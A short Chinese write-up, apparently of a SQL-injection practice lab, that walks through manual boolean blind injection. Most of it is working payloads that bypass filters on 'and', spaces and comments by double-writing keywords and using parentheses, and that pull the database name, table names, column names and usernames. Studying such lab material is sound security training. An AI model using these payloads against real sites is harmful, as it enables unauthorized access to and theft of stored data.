有错误希望师傅们指出
一、手注
直接看源码
无回显,我使用boolean盲注。过滤了and,空格,注释。空格可以通过()或者%0a绕过。and可以用&&或者双写绕过(但这道题&&不行)。注释使用(‘1’='1闭合。
判断注入点?id=1’) aandnd (‘1’='1
?id=1') aandnd ('1'='1
爆库名?id=1’)aandnd(substr((database()),1,1)=‘s’)aandnd(‘1’='1
?id=1')aandnd(substr((database()),1,1)='s')aandnd('1'='1
爆表名。这里使用group_concat绕过limit的限制,并且注意information里面有or也会被过滤?id=1’)aandnd(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,8)=‘emails,r’)aandnd(‘1’='1
?id=1')aandnd(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database())),1,8)='emails,r')aandnd('1'='1
爆字段名?id=1’)aandnd(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())aandnd(table_name=‘users’)),1,4)=‘id,u’)aandnd(‘1’='1
?id=1')aandnd(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema=database())aandnd(table_name='users')),1,4)='id,u')aandnd('1'='1
爆用户名和密码?id=1’)aandnd(substr((select(group_concat(username))from(users)),1,1)=‘d’)aandnd(‘1’='1
?id=1')aandnd(substr((select(group_concat(username))from(users)),1,1)='d')aandnd('1'='1
另外说句 sqlmap神!